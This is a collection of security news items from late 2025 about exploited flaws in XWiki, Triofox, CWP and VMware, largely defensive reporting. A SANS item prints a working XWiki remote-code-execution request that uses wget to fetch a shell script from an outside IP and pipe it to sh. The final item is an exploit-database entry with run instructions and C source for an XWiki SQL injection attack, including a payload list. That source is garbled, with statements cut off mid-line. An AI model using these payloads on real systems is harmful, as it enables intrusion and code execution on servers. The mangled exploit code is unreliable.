practices to ensure optimal protection. "CVE-2025-24893 is a familiar story: one attacker moves first, and many follow," VulnCheck's Jacob Baines said. "Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability."
thehackernews.comNov 15, 2025extracted
Critical Triofox Vulnerability Exploited in the Wild
A threat actor has exploited a critical vulnerability in Triofox to obtain remote access to a vulnerable server and then achieve code execution, Google warns. Designed to ease remote work and data management, Gladinet’s Triofox is a secure file sharing and remote access solution that can be integrated with existing IT infrastructure. Prior to version 16.7.10368.56560, Triofox was affected by a critical-severity improper access control vulnerability that allowed attackers to access initial setup pages even after the setup process was completed. The issue, tracked as CVE-2025-12480 (CVSS score of 9.1), was resolved in late July by preventing access to the initial configuration pages after Triofox had been set up. In late August, Google caught a threat actor tracked as UNC6485 exploiting the security defect against a vulnerable Triofox server in an HTTP Host header attack, to create a new administrative account. The threat actor modified an HTTP GET request to the AdminDatabase.aspx page, which is automatically launched after Triofox is installed. From there, the attackers accessed the AdminAccount.aspx page, which redirects to the InitAccount.aspx page, where they created a new administrator account. The attack was possible because ASP.NET would use the HTTP host header, which could be modified by the threat actor, to build Request.Url, because Triofox did not check if the request came from a localhost connection, and because no protection was present aside from the Host header check. After creating the new admin account, the attackers logged in to the server and abused a built-in antivirus feature that allows users to provide an arbitrary path for the antivirus, to execute a malicious file with System privileges. When publishing a new share in Triofox, the application displays the folder path on disk of any shared folder. The attackers uploaded an arbitrary file to a published share, and then configured the path of the antivirus to point to it. The file, a malicious batch script, executed a PowerShell command to fetch and run a second-stage payload identified as a copy of the legitimate Zoho Unified Endpoint Management System (UEMS) software installer. The agent was used to execute the Zoho Assist and AnyDesk remote access tools. UNC6485 used Zoho Assist to enumerate active SMB sessions and user information and was seen attempting to change the passwords for existing accounts, and to add these to the local and domain administrator groups. Additionally, the threat actor deployed two utilities to set up an encrypted tunnel via SSH to their command-and-control (C&C) server, Google explains. Organizations using Triofox are advised to update to version 16.7.10368.56560 or newer, to audit administrator accounts, and ensure that the Triofox antivirus engine is not allowed to execute unauthorized scripts or binaries. Related: Runc Vulnerabilities Can Be Exploited to Escape Containers Related: CISA Warns of CWP Vulnerability Exploited in the Wild Related: Exploited ‘Post SMTP’ Plugin Flaw Exposes WordPress Sites to Takeover Related: CISA Adds Exploited XWiki, VMware Flaws to KEV Catalog
securityweek.comNov 11, 2025extracted
CISA Warns of CWP Vulnerability Exploited in the Wild
The cybersecurity agency CISA on Tuesday warned that a critical vulnerability affecting the Control Web Panel (CWP) server administration software has been exploited in the wild. CWP, previously named CentOS Web Panel, is a free and widely used Linux web hosting control panel that is designed to simplify server management. A vulnerability in CWP, tracked as CVE-2025-48703, allows remote, unauthenticated attackers to execute arbitrary commands on vulnerable systems. An attacker in possession of a valid non-root username can bypass authentication and execute commands using specially crafted requests. The vulnerability was reported to CWP developers in mid-May and patched roughly one month later with the release of version 0.9.8.1205. There do not appear to be any public reports describing attacks in which CVE-2025-48703 has been exploited. Findsec warned a few months ago that exploitation of the vulnerability had been imminent. The company noted that exploitation could be automated and that threat actors had already started developing and sharing exploits on cybercrime forums. According to Netlas.io, there are roughly 150,000 internet-exposed CWP instances that are potentially affected by CVE-2025-48703, a majority in the United States (37,510), followed by Germany, Japan, India, France, and Canada. Shodan shows more than 220,000 internet-exposed instances. Given this widespread exposure, it’s highly likely that the vulnerability has been exploited in opportunistic attacks. CISA added CVE-2025-48703 to its Known Exploited Vulnerabilities (KEV) catalog and instructed federal agencies to address it by November 25. In-the-wild exploitation of a CWP vulnerability was previously reported in early 2023. Related: Critical Flaw in Popular React Native NPM Package Exposes Developers to Attacks Related: CISA Warns of Exploited DELMIA Factory Software Vulnerabilities Related: CISA Adds Exploited XWiki, VMware Flaws to KEV Catalog
securityweek.comNov 5, 2025extracted
XWiki SolrSearch Exploit Attempts (CVE-2025-24893) with link to Chicago Gangs/Rappers, (Mon, Nov 3rd)
XWiki describes itself as "The Advanced Open-Source Enterprise Wiki" and considers itself an alternative to Confluence and MediaWiki. In February, XWiki released an advisory (and patch) for an arbitrary remote code execution vulnerability. Affected was the SolrSearch component, which any user, even with minimal "Guest" privileges, can use. The advisory included PoC code, so it is a bit odd that it took so long for the vulnerability to be widely exploited. NIST added the vulnerability to its "Known Exploited Vulnerabilities" list this past Friday. Our data shows some reconnaissance scans starting in July, but actual exploit attempts did not commence until yesterday. The exploit requests are relatively straightforward: GET /xwiki/bin/get/Main/SolrSearch?media=rss&text={{async async=false}}{{groovy}}['sh', '-c', 'wget -qO- http://74.194.191.52/rondo.sdu.sh|sh'].execute().text{{/groovy}}{{/async}} HTTP/1.1 Host: [honeypot IP address] User-Agent: Mozilla/5.0 ([email protected]) Connection: close Accept: */* The exploit attempt is loading a shell script from 74.194.191.52. The script is no longer present on the site. However, the site displays what appears to be an advertisement for a fairly average rap song, and it also displays the same email address as the one included in the user agent. Maybe the actual attacker's email address? I will try to reach out to see what I get back. The page returned, instead of the malware, is advertising the Chicago rapper "King Lil Jay". King Lil Jay is a rival of RondoNumbaNine, and both are currently incarcerated. The reference to "rondo" in the malware script name is likely referring to RondoNumbaNine. In the past, both rappers were affiliated with opposing gangs in Chicago, and in part, participated in and celebrated in their music the violence associated with the gang rivalry. While, according to some reports [3], the two rappers ended their rivalry, it is odd to see some of this come up in a random online attack. [1] https://www.xwiki.org/xwiki/bin/view/Main/WebHome [2] https://nvd.nist.gov/vuln/detail/CVE-2025-24893 [3] https://www.youtube.com/shorts/llh53PYnHWQ -- Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu Twitter|
isc.sans.eduNov 3, 2025extracted
Chinese APT Uses ‘Airstalk’ Malware in Supply Chain Attacks
A suspected Chinese state-sponsored threat actor has been deploying an AirWatch API-abusing malware family in supply chain attacks, Palo Alto Networks reports. The APT, tracked as CL-STA-1009, has been targeting business process outsourcing (BPO) entities, which typically have access to critical business systems within their clients’ networks. According to Palo Alto Networks, organizations specializing in BPO have been increasingly targeted by cybercriminals and state-sponsored hackers. These entities can be abused in supply chain attacks, as gateways to multiple target environments. “BPOs typically leverage the economy of scale to have highly specialized talent service multiple clients concurrently. […] Attackers are willing to invest generously in the resources necessary to not only compromise them but maintain access indefinitely,” the cybersecurity firm notes. As part of the CL-STA-1009 attacks observed by Palo Alto Networks, two variants of a malware family dubbed Airstalk were seen, one written in PowerShell and the other written in .NET. Both variants abuse the AirWatch API for mobile device management (MDM) to establish a covert communication channel with the command-and-control (C&C) server, employ a multi-threaded communication protocol, and were signed using likely stolen certificates. The PowerShell iteration of Airstalk can receive commands from the C&C to take screenshots, list files in the user directory, list Chrome profiles, and harvest data from Chrome, including cookies, bookmarks, and browser history. The .NET variant of Airstalk uses a slightly different communications protocol and has more capabilities, targeting Microsoft Edge and Island Browser in addition to Chrome. In addition to stealing browser data, it can open URLs in Chrome. The malware employs various defense techniques, such as the use of a revoked certificate likely issued to a legitimate organization last year. The malware’s developer altered the samples’ timestamps so they would remain undetected within BPO organizations’ networks. “CL-STA-1009 is a threat activity cluster representing activity from a suspected nation-state actor. This cluster is associated with Airstalk malware, which we assess with medium confidence adversaries used in supply chain attacks,” Palo Alto Networks says. Related: Chinese APT Exploits Unpatched Windows Flaw in Recent Attacks Related: Russian APT Switches to New Backdoor After Malware Exposed by Researchers Related: Lumma Stealer Activity Drops After Doxxing Related: CISA Adds Exploited XWiki, VMware Flaws to KEV Catalog
securityweek.comNov 3, 2025extracted
CISA Adds Exploited XWiki, VMware Flaws to KEV Catalog
The US cybersecurity agency CISA on Thursday expanded its Known Exploited Vulnerabilities (KEV) catalog with two security defects impacting XWiki and VMware products. The XWiki flaw, tracked as CVE-2025-24893 (CVSS score of 9.8), is an improper sanitization of search parameters that can be exploited remotely, without authentication, to inject malicious code via specially crafted search requests. Successful exploitation of the issue allows attackers to execute code with the privileges of the web server, to leak sensitive information, or disrupt survey operations. Proof-of-concept (PoC) exploits targeting the bug have been available for roughly half a year and exploitation attempts were initially observed in March, albeit they were flagged as reconnaissance efforts. Earlier this week, however, VulnCheck warned that a threat actor has been exploiting the XWiki vulnerability to drop a cryptocurrency miner. The VMware defect, tracked as CVE-2025-41244 (CVSS score of 7.8), is a local privilege escalation flaw affecting Aria Operations and VMware Tools that allows authenticated attackers to obtain root privileges on a VM that has VMware Tools installed and is managed by Aria Operations with SDMP enabled. Broadcom rolled out fixes for the bug in late September, but failed to mention its in-the-wild exploitation. NVISO, which was credited for reporting the issue, reported that Chinese threat actors have been targeting the CVE for roughly a year. On Thursday, Broadcom updated its advisory, noting that it “has information to suggest that suspected exploitation of CVE-2025-41244 has occurred in the wild”. Simultaneously, CISA added the CVE, along with the XWiki defect, to the KEV list, urging federal agencies to patch them by November 20, as mandated by Binding Operational Directive (BOD) 22-01. Related: CISA Warns of Exploited DELMIA Factory Software Vulnerabilities Related: Year-Old WordPress Plugin Flaws Exploited to Hack Websites Related: Critical Windows Server WSUS Vulnerability Exploited in the Wild Related: Lanscope Endpoint Manager Zero-Day Exploited in the Wild
securityweek.comOct 31, 2025extracted
CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting Broadcom VMware Tools and VMware Aria Operations to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. The vulnerability in question is CVE-2025-41244 (CVSS score: 7.8), which could be exploited by an attacker to attain root level privileges on a susceptible system. "Broadcom VMware Aria Operations and VMware Tools contain a privilege defined with unsafe actions vulnerability," CISA said in an alert. "A malicious local actor with non-administrative privileges having access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled may exploit this vulnerability to escalate privileges to root on the same VM." The vulnerability was addressed by Broadcom-owned VMware last month, but not before it was exploited as a zero-day by unknown threat actors since mid-October 2024, according to NVISO Labs. The cybersecurity company said it discovered the vulnerability earlier this May during an incident response engagement. The activity is attributed to a China-linked threat actor Google Mandiant tracks as UNC5174, with NVISO Labs describing the flaw as trivial to exploit. Details surrounding the exact payload executed following the weaponization of CVE-2025-41244 have been currently withheld. "When successful, exploitation of the local privilege escalation results in unprivileged users achieving code execution in privileged contexts (e.g., root)," security researcher Maxime Thiebaut said. "We can, however, not assess whether this exploit was part of UNC5174's capabilities or whether the zero-day's usage was merely accidental due to its trivialness." Also placed in the KEV catalog is a critical eval injection vulnerability in XWiki that could permit any guest user to perform arbitrary remote code execution by means of a specially crafted request to the "/bin/get/Main/SolrSearch" endpoint. Earlier this week, VulnCheck revealed that it observed attempts by unknown threat actors to exploit the flaw and deliver a cryptocurrency miner. Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary mitigations by November 20, 2025, to secure their networks against active threats.
thehackernews.comOct 31, 2025extracted
XWiki Vulnerability Exploited in Cryptocurrency Mining Operation
A critical-severity vulnerability in the popular open source enterprise wiki platform XWiki has been exploited in the wild as part of a low-end cryptocurrency mining operation, VulnCheck reports. The issue, tracked as CVE-2025-24893 (CVSS score of 9.8), allows attackers to execute arbitrary code remotely, by sending a request to the SolrSearch macro, which uses the embedded Solr engine for full-text search. Because the macro improperly sanitizes search parameters in Groovy, a remote, unauthenticated attacker can craft search requests and inject malicious code that will be executed with the privileges of the web server. “The specific flaw exists within the handling of the text parameter provided to the SolrSearchMacros endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account,” a ZDI advisory reads. Successful exploitation of the flaw allows attackers to expose sensitive information, disrupt survey operations, or execute arbitrary system commands with the privileges of the user running the web server. The security defect was reported by Trend Micro’s John Kwak in May 2024, and was addressed in XWiki versions 15.10.11, 16.4.1 and 16.5.0RC1, in June 2024. Technical details on the bug emerged roughly half a year later and an NVD advisory was published in February. Numerous proof-of-concept (PoC) exploits targeting it have been available since early 2025. CrowdSec earlier this year observed the vulnerability being abused for reconnaissance, but noted a decline in activity surrounding it. Now, VulnCheck says it has identified in-the-wild attacks exploiting CVE-2025-24893 to deploy a cryptocurrency miner. “We observed multiple exploit attempts against our XWiki canaries coming from an attacker geolocated in Vietnam. The exploitation proceeds in a two-pass workflow separated by at least 20 minutes: the first pass stages a downloader (writes a file to disk), and the second pass later executes it,” VulnCheck notes. The attacks, VulnCheck says, appear to be part of a low-end crypto mining operation, and the observed traffic originates from an IP address that has been associated with other malicious activity as well. Related: CISA Warns of Exploited DELMIA Factory Software Vulnerabilities Related: QNAP NetBak PC Agent Affected by Recent ASP.NET Core Vulnerability Related: Critical Windows Server WSUS Vulnerability Exploited in the Wild Related: CISA Warns of Exploited Apple, Kentico, Microsoft Vulnerabilities
securityweek.comOct 29, 2025extracted
Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack
Threat actors are actively exploiting multiple security flaws impacting Dassault Systèmes DELMIA Apriso and XWiki, according to alerts issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and VulnCheck. The vulnerabilities are listed below - CVE-2025-6204 (CVSS score: 8.0) - A code injection vulnerability in Dassault Systèmes DELMIA Apriso that could allow an attacker to execute arbitrary code. CVE-2025-6205 (CVSS score: 9.1) - A missing authorization vulnerability in Dassault Systèmes DELMIA Apriso that could allow an attacker to gain privileged access to the application. CVE-2025-24893 (CVSS score: 9.8) - An improper neutralization of input in a dynamic evaluation call (aka eval injection) in XWiki that could allow any guest user to perform arbitrary remote code execution through a request to the "/bin/get/Main/SolrSearch" endpoint. Both CVE-2025-6204 and CVE-2025-6205 affect DELMIA Apriso versions from Release 2020 through Release 2025. They were addressed by Dassault Systèmes in early August. According to details shared by ProjectDiscovery researchers Rahul Maini, Harsh Jaiswal, and Parth Malhotra last month, the two security flaws can be fashioned together into an exploit chain to create accounts with elevated privileges and then drop executable files into a web-served directory, resulting in a full application compromise. Interestingly, the addition of the two shortcomings to the Known Exploited Vulnerabilities (KEV) catalog comes a little over a month after CISA flagged the exploitation of another critical flaw in the same product (CVE-2025-5086, CVSS score: 9.0), a week after the SANS Internet Storm Center detected in-the-wild attempts. It's currently not known if these efforts are related. VulnCheck, which first detected exploitation attempts targeting CVE-2025-24893 on October 24, 2025, said the vulnerability is being abused as part of a two-stage attack chain that delivers a cryptocurrency miner. According to CrowdSec and Cyble, the vulnerability is said to have been weaponized in real-world attacks as far back as March 2025. "We observed multiple exploit attempts against our XWiki canaries coming from an attacker geolocated in Vietnam," VulnCheck's Jacob Baines said. "The exploitation proceeds in a two-pass workflow separated by at least 20 minutes: the first pass stages a downloader (writes a file to disk), and the second pass later executes it." The payload uses wget to retrieve a downloader ("x640") from "193.32.208[.]24:8080" and write it to the "/tmp/11909" location. The downloader, in turn, runs shell commands to fetch two additional payloads from the same server - x521, which fetches the cryptocurrency miner located at "193.32.208[.]24:8080/rDuiQRKhs5/tcrond" x522, which kills competing miners such as XMRig and Kinsing, and launches the miner with a c3pool.org configuration The attack traffic, per VulnCheck, originates from an IP address that geolocates to Vietnam ("123.25.249[.]88") and has been flagged as malicious in AbuseIPDB for engaging in brute-force attempts as recently as October 26, 2025. In light of active exploitation, users are advised to apply the necessary updates as soon as possible to safeguard against threats. Several Civilian Executive Branch (FCEB) agencies are required to remediate the DELMIA Apriso flaws by November 18, 2025.
thehackernews.comOct 29, 2025extracted
[webapps] XWiki 14 - SQL Injection via getdeleteddocuments.vm
Exploit Title: XWiki 14 - SQL Injection via getdeleteddocuments.vm Google Dork: N/A Date: 28 July 2025 Exploit Author: Byte Reaper LinkedIn: N/A Vendor Homepage: https://www.xwiki.org Software Link: https://www.xwiki.org Version: XWiki Platform ≤ 14.x Tested on: XWiki Platform ≤ 14.x CVE: CVE-2025-32429 Vulnerability Description A blind SQL Injection vulnerability exists in the XWiki Platform’s getdeleteddocuments.vm template, specifically via the sort parameter. The vulnerability can be exploited by sending a crafted payload to the following REST endpoint: `` /xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort= ` An attacker can inject arbitrary SQL statements into the underlying database query, resulting in data exfiltration, authentication bypass, or denial of service. The vulnerability was verified on XWiki Platform versions up to 14.x using a C-based curl exploit. Steps to Reproduce 1. Save the provided exploit.c file to your local environment. 2. Compile the PoC: ` gcc -o exploit exploit.c argparse.c -lcurl ` 3. Execute against a vulnerable instance: ` ./exploit -u http://victim.example.com/xwiki `` 4. Observe response delays or injected content indicating successful SQL execution. Proof of Concept GitHub PoC: https://github.com/byteReaper77/CVE-2025-32429/blob/main/exploit.c /* * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-32429 * Vulnerability: SQL Injection * Description : A vulnerability in the xwiki platform using the sort operator in the getdeletedocuments.v file, which leads to injecting malicious SQL statements into the sort= parameter. * ------------------------------------------------------------------------------------------------------------------------------------ */ #include #include #include #include "argparse.h" #include #include #include #define URL 2500 const char *yourUrl = NULL; int verbose = 0; int selecetCookie = 0; const char *cookies = NULL; void exitAssembly() { asm volatile ( "xor %%rdi, %%rdi\n\t" "mov $231, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitAssembly(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } const char *payload[] = { "' OR '1", " ' OR 1 -- -", " OR "" = ", "\" OR 1 = 1 -- -", ",(select * from (select(sleep(5)))a)", "%2c(select%20*%20from%20(select(sleep(5)))a)", "';WAITFOR DELAY '0:0:05'--", "AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='", "AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)", "AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--", "AS INJECTX WHERE 1=1 AND 1=0--", "WHERE 1=1 AND 1=1" }; const char *word[] = { "select", "union", "insert", "update", "delete", "drop", "create", "alter", "truncate", "replace", "or", "and", "not", "1=1", "1=0", "--", "#", "/*", "*/", "sleep", "benchmark", "load_file", "outfile", "error", "warning", "mysql", "pg_", "exec", "xp_", "admin", "root", "" }; int numberPayload = sizeof(payload) / sizeof(payload[0]); int numberWord = sizeof(word) / sizeof(word[0]); char full[URL]; void injection(const char *baseUrl) { CURLcode res ; CURL *curl = curl_easy_init(); struct Mem response = { NULL, 0 }; if (curl == NULL) { printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n"); printf("\e[1;31m[-] Check Your Connection (Ping)...\e[0m\n"); printf("\e[1;31m[-] Command : ping google.com\n"); const char *pingCommand = "/bin/ping"; const char *argv[] = {"ping", "-c", "5", "google.com", NULL}; const char *envp[] = {NULL}; asm volatile ( "mov %[argv], %%rsi\n\t" "mov $59, %%rax\n\t" "mov %[envp], %%rdx\n\t" "mov %[command], %%rdi\n\t" "syscall\n\t" "cmp $0, %%rax\n\t" "jl exitSyscall\n\t" "exitSyscall:\n\t" "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" ".2:\n\t" : : [argv] "r" (argv), [envp] "r" (envp), [command] "r" (pingCommand) : "rax", "rdi", "rsi", "rdx" ); } response.buffer = NULL; response.len = 0; if (verbose) { printf("\e[1;35m==========================================\e[0m\n"); printf("\e[1;33m[+] Cleaning Response...\e[0m\n"); printf("\e[1;33m[+] Response Buffer : %s\e[0m\n",response.buffer); printf("\e[1;33m[+] Response Len : %d\e[0m\n",response.len); printf("\e[1;35m==========================================\e[0m\n"); } if (curl) { int n = 0; for (int p = 0; p %ld\e[0m\n", httpCode); if (httpCode >= 200 && httpCode = 7.5) { printf("\e[1;34m[+] Possible SQL Executed (Delay Detected)\e[0m\n"); printf("\e[1;34m[+] The server is experiencing a vulnerability (CVE-2025-32429)\e[0m\n"); } else { printf("\e[1;31m[-] No response delay detected !\e[0m\n"); } } else { printf("\e[1;31m[-] No suspicious words were found in the server response !\e[0m\n"); } } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 1) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Suspicious number of redirects: %ld\e[0m\n", redirects); printf("\e[1;35m============================================\e[0m\n"); step1 = 1; } else { printf("[-] Waf not detected (Number redirects)\e[0m\n"); } printf("\e[1;34m[+] Request sent with simple payload ('')\e[0m\n"); printf("\e[1;35m[+] Step 2: Check HTTP Code\e[0m\n"); printf("\e[1;32m[+] HTTP Code: %ld\e[0m\n", code); if (code == 403 || code == 404 || code == 503) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Blocking response code: %ld\e[0m\n", code); printf("\e[1;34m[+] Page is likely filtered by WAF.\e[0m\n"); printf("\e[1;35m============================================\e[0m\n"); step2 = 1; } else { printf("\e[1;31m[-] No blocking HTTP code.\e[0m\n"); printf("\e[1;31m[-] WAF not detected based on HTTP code.\e[0m\n"); } printf("[+] Step 3: Check Response Time\e[0m\n"); if (timeD >= 3.0) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Suspicious delay in response: %.2f sec\e[0m\n", timeD); printf("\e[1;35m============================================\e[0m\n"); step3 = 1; } else { printf("\e[1;31m[-] Normal response time: %.2f sec\e[0m\n", timeD); printf("\e[1;31m[-] WAF not detected based on delay.\e[0m\n"); } printf("[+] Step 4: Check Response Content\e[0m\n"); for (int l = 0; l < numberWaf; l++) { if (response.buffer) { if (strstr(response.buffer, keyWaf[l])) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Word Found : %s\e[0m\n",keyWaf[l]); printf("\e[1;34m[+] Waf Detected (Word Found In Response)\e[0m\n"); printf("\e[1;35m============================================\e[0m\n"); step4 = 1; } else { printf("\e[1;31m[-] Word Not Found : %s\e[0m\n", keyWaf[l]); printf("\e[1;31m[-] WAF not detected (Not Found Word in response)\e[0m\n"); } } else { printf("\e[1;31m[-] Response Buffer is NULL !\n"); printf("\e[1;35m[+] Step 5 : Check Response Server (NULL + Http Code 200)\e[0m\n"); if (code == 200) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;32m[+] Http Code : %ld\n", code); printf("\e[1;34m[+] Waf Detected (Response NULL And http Code 200)\e[0m\n"); if (verbose && response.buffer) { printf("\e[1;35m[+] Response Server : ==========================================\e[0m\n"); printf("%s\e[0m\n", response.buffer); } printf("\e[1;35m============================================\e[0m\n"); step5 = 1; } else { printf("\e[1;31m[-] Waf Not Detected (Http Code not 200 And buffer NULL)!\e[0m\n"); } } } } else { printf("[!] curl_easy_perform() failed: %s\e[0m\n", curl_easy_strerror(res)); } printf("\e[1;35m[+] Step 6: Check Connection Reset\e[0m\n"); if (res == CURLE_RECV_ERROR) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Connection reset detected (CURLE_RECV_ERROR)\e[0m\n"); printf("\e[1;35m============================================\e[0m\n"); } else { printf("\e[1;31m[-] No connection reset error.\e[0m\n"); } curl_slist_free_all(headers); curl_easy_cleanup(curl); printf("\e[1;35m\n[+] Result Status Waf : \e[0m\n"); if (step1 || step2 || step3 || step4 || step5) { printf("\e[1;36m[=] Final Verdict: WAF Detected \e[0m\n"); } else { printf("\e[1;31m[=] Final Verdict: No WAF Detected !\e[0m\n"); } } int main(int argc, const char **argv) { printf ( "⣦⠃⣿⣶⣶⣶⣶⣾⠀⠀⠀⠀⠀⠀⢀⡴⣲⠋⢁⡴⠋⠁⠀⣠⠶⠋⠁⠀⣠⢴⠆⠀⢠⠆⠀⢀⣠⢞⡓⠒⠀⠀⠉⠓⠲⢤⣀⠀⠀⠀⠀⠉⢧⡀⠀⠀⠀⠀⠀\n" " ⠀⣿⣿⣿⣿⣿⠇⠀⠀⠀⣀⡤⠚⠁⡼⣣⡴⠋⠀⠀⢀⡞⠁⠀⠀⢀⣠⣿⡋⠀⣠⣿⠴⠚⣉⣉⠉⠉⠉⠛⠭⣟⠒⢤⣀⠈⠙⠦⢄⣀⠀⠈⢣⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⠀⣸⣿⣿⣿⣿⡟⠀⣴⠚⠉⠁⠀⢀⡾⠟⠉⠀⠀⣀⣴⡟⠀⠀⣠⣖⣋⢹⣿⢁⣾⣏⠠⢤⣀⡀⠉⠙⠆⠀⠀⠀⠈⠳⢤⡈⠳⣄⠀⠀⠉⠙⠶⣌⣳⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⠀⣿⣿⣿⣿⡿⠀⠀⠈⠛⣒⣒⡾⠋⠀⠀⢀⣤⣾⢫⠟⠀⠀⣸⠧⣄⠘⠳⢯⡉⠈⠉⠓⣄⠀⠉⠻⣍⠛⠲⣄⠀⠀⠀⠀⠙⢦⡈⠓⢄⠀⠀⠀⠀⠙⢷⡀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⡸⣿⣿⡹⢿⣃⣀⠴⠊⠉⣠⠎⠀⠀⢀⣶⣿⠾⡵⠋⠀⠀⡼⣡⠴⣦⣀⣀⠀⠉⠲⣄⠀⠈⢳⡀⠀⠀⠱⣄⠀⠙⢆⠀⠀⠀⠀⠙⢦⡀⠱⣄⠀⠀⠀⠀⠹⣌⣓⣶⢶⡦⠀⠀⠀\n" "⢳⣿⣿⣿⣟⠟⠃⠀⣠⠞⠁⠀⠀⣤⠛⠛⢒⣾⢁⣴⣤⠞⢰⡇⢸⠋⢻⠈⣝⢦⡀⠈⠓⢄⠀⠱⡀⠀⠀⠈⠳⡀⠀⠳⣄⠀⠀⠀⠀⠙⢦⠈⠳⡀⠀⠲⣄⠈⢿⡄⠀⠀⠀⠀⠀\n" "⣼⣿⣿⢟⣡⡴⣹⠟⢁⠀⢀⣠⠞⠉⣽⠯⠉⢉⣽⢿⣶⣤⢸⢁⠿⡀⢸⡇⢘⢦⢻⡳⣄⠀⠀⠀⠙⣆⠀⠀⠀⠙⢆⠀⠘⢦⡀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠨⠵⣶⡄⠀⠀⠀⠀⠀\n" "⣿⡿⣵⣿⠋⠺⢥⣴⣯⠞⡋⢀⣤⠞⣱⢯⣴⠏⢡⡏⠀⢿⠸⢸⡀⡇⠈⣧⠈⢾⢏⢧⡈⠓⢦⡀⠀⠙⢧⣀⠀⠀⠈⠳⣄⠀⢳⡀⠀⠀⠀⠀⠀⠀⠀⠀⠐⢺⣯⣽⣦⠀⠀⠀⠀\n" "⣿⣾⣿⡅⠀⠀⠀⠸⠯⠯⡖⠋⣰⣣⢣⣿⠃⢀⠏⢠⠀⣾⠀⡞⣧⡇⠀⢸⡄⠘⣞⢇⣌⢆⠀⢻⡳⣄⡀⠈⠓⠤⣄⠀⠈⢣⣀⠻⡀⢦⡀⠀⠀⠀⠀⢀⣀⣰⣆⠉⡝⣧⠀⠀⠀\n" "⣿⢯⣿⠙⢦⠀⠀⠀⠀⣼⢁⣼⢇⢏⡿⠃⠀⡾⠀⡌⢀⡏⢰⡇⣿⢿⡇⢸⠻⠀⢸⡞⣯⡜⢦⠀⢷⠈⢻⡳⢤⡀⠈⠙⠒⠀⠙⢳⣅⠀⠙⣄⠀⠀⢸⣿⣿⣿⣿⣆⢰⣸⡄⠀⠀\n" "⡏⣼⣿⠒⠒⠤⠤⢤⣸⠃⡼⡛⢸⣼⡇⢠⣠⠁⢸⠁⣼⡇⢸⠀⡿⣿⡇⠸⠀⠀⠀⢻⡘⣧⠘⣇⠘⡆⠀⠹⣦⡈⠓⠦⣄⡀⠀⠀⠉⠳⣄⠈⢇⠀⠐⢿⣿⡛⠟⠋⠀⡇⣧⠀⠀\n" "⢠⣿⣿⠀⠀⠀⣠⡾⡿⣼⣧⡇⡇⣿⠀⠀⠻⣄⠀⠀⡇⡇⡆⠀⢻⣿⢇⢶⡀⢠⡄⠈⡿⡸⡆⢸⠀⢧⡀⠀⢻⠙⢆⠀⠀⠉⢳⡦⣄⣀⣈⠙⠾⣄⡀⠀⠀⢰⠀⠀⢠⡇⣿⠀⠀\n" "⣸⣿⣿⣄⣤⣾⠟⢠⡇⡏⣿⡇⣧⣿⠀⣀⡀⠈⣧⠀⡇⡇⡇⢸⢸⣿⢸⣼⢷⡀⠹⣄⠁⢳⡁⠀⡇⢈⢣⠀⠈⡇⠈⢧⡀⠀⠀⢷⡀⢢⠈⢹⡛⠓⠙⠛⠒⠈⡇⠀⠸⡇⣿⠀⠀\n" "⣿⣿⠟⣩⡞⠁⠀⢸⣷⠀⡟⡇⢸⠋⠻⢷⣝⢦⣿⣆⠀⡇⡇⢸⣾⣿⢼⣿⣼⣳⡄⢹⣧⡀⠁⠀⠗⢸⢸⠀⠀⡇⠀⠀⣷⡀⠀⠀⣷⡈⠀⠀⢧⢘⡀⠀⢀⠀⢸⡀⠀⣇⣿⠀⠀\n" "⠛⣡⣾⡏⠀⠀⠀⠀⣿⠀⠃⢻⣼⡀⣠⡄⠙⠿⡟⢹⠘⣿⠁⠀⠀⣿⠀⢻⠈⡏⠻⡄⢿⢳⡀⠀⢀⡟⠸⡇⠀⢸⠀⠀⢸⣷⡀⠀⢳⠳⡀⠀⠸⡎⡇⠀⠸⡇⠀⢷⠀⢹⠇⠀⠀\n" 